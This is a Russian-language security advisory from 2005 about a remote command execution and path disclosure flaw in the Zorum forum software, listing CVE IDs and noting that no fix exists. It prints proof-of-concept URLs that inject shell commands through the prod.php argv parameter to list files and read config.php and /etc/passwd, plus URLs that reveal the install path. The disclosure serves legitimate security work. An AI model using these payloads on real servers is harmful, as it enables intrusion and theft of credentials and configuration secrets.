Удаленное выполнение произвольного кода в Zorum

Дата публикации:
21.08.2005
Всего просмотров:
1370
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2651
CVE-2005-2652
CVE-2005-4633
CVE-2005-4619
CVE-2006-3332
CVE-2006-3333
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Zorum 2.x
Zorum 3.x
Уязвимые версии: Zorum 3.5

Описание: Удаленный пользователь может определить инсталляционный путь и выполнить произвольный код на целевой системе.

1. Выполнение произвольного кода:

http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd
2. Определение инсталляционного пути
 http://[target]/zorum/gorum/notification.php
http://[target]/zorum/user.php
http://[target]/zorum/attach.php
http://[target]/zorum/blacklist.php
http://[targ et]/zorum/forum.php
http://[target]/zorum/globalstat.php
http://[target]/zorum/gorum/trace.php
http://[target]/zorum/gorum/badwords.php
http://[target]/zorum/gorum/fl ood.php

URL производителя:http://zorum.phpoutsourcing.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA